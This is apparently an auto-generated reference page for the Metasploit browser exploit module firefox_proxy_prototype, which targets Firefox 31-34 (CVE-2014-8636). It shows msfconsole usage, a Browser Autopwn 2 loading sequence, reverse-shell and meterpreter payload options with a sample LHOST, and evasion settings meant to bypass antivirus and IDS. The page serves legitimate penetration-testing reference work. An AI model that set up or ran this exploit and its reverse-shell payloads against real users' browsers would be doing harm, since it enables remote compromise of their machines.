Firefox Proxy Prototype Privileged Javascript Injection - Metasploit


This page contains detailed information about how to use the exploit/multi/browser/firefox_proxy_prototype metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Firefox Proxy Prototype Privileged Javascript Injection
Module: exploit/multi/browser/firefox_proxy_prototype
Source code: modules/exploits/multi/browser/firefox_proxy_prototype.rb
Disclosure date: 2014-01-20
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-8636, CVE-2015-0802

This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/browser/firefox_proxy_prototype
msf exploit(firefox_proxy_prototype) > run

This module is also supported by Browser Autopwn 2.

To load it from Browser Autopwn 2, here's how:

msf > use auxiliary/server/browser_autopwn2 
msf auxiliary(browser_autopwn2) > set INCLUDE_PATTERN firefox_proxy_prototype
INCLUDE_PATTERN => firefox_proxy_prototype
msf auxiliary(browser_autopwn2) > exploit

Go back to menu.

Msfconsole Usage


Here is how the multi/browser/firefox_proxy_prototype exploit module looks in the msfconsole:

msf6 > use exploit/multi/browser/firefox_proxy_prototype

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_proxy_prototype) > show info

       Name: Firefox Proxy Prototype Privileged Javascript Injection
     Module: exploit/multi/browser/firefox_proxy_prototype
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2014-01-20

Provided by:
  joev <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Universal (Javascript XPCOM Shell)
  1   Native Payload

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CONTENT                   no        Content to display inside the HTML <body>.
  Retries  true             no        Allow the browser to retry the module
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This exploit gains remote code execution on Firefox 31-34 by abusing 
  a bug in the XPConnect component and gaining a reference to the 
  privileged chrome:// window. This exploit requires the user to click 
  anywhere on the page to trigger the vulnerability.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-8636
  https://nvd.nist.gov/vuln/detail/CVE-2015-0802
  https://bugzilla.mozilla.org/show_bug.cgi?id=1120261
  https://blog.rapid7.com/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636

Module Options


This is a complete list of options available in the multi/browser/firefox_proxy_prototype exploit:

msf6 exploit(multi/browser/firefox_proxy_prototype) > show options

Module options (exploit/multi/browser/firefox_proxy_prototype):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CONTENT                   no        Content to display inside the HTML <body>.
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)

Advanced Options


Here is a complete list of advanced options supported by the multi/browser/firefox_proxy_prototype exploit:

msf6 exploit(multi/browser/firefox_proxy_prototype) > show advanced

Module advanced options (exploit/multi/browser/firefox_proxy_prototype):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   CookieExpiration                         no        Cookie expiration in years (blank=expire on exit)
   CookieName              __ua             no        The name of the tracking cookie
   Custom404                                no        An external custom 404 URL (Example: http://example.com/404.html)
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   JsIdentifiers                            no        Identifiers to preserve for JsObfu
   JsObfuscate             0                no        Number of times to obfuscate JavaScript
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/browser/firefox_proxy_prototype module can exploit:

msf6 exploit(multi/browser/firefox_proxy_prototype) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)
   1   Native Payload

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/browser/firefox_proxy_prototype exploit:

msf6 exploit(multi/browser/firefox_proxy_prototype) > show payloads

Compatible Payloads
===================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  payload/firefox/exec                                      normal  No     Firefox XPCOM Execute Command
   1  payload/firefox/shell_bind_tcp                            normal  No     Command Shell, Bind TCP (via Firefox XPCOM script)
   2  payload/firefox/shell_reverse_tcp                         normal  No     Command Shell, Reverse TCP (via Firefox XPCOM script)
   3  payload/generic/custom                                    normal  No     Custom Payload
   4  payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   5  payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   6  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   7  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/browser/firefox_proxy_prototype exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/browser/firefox_proxy_prototype) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • joev

Version


This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.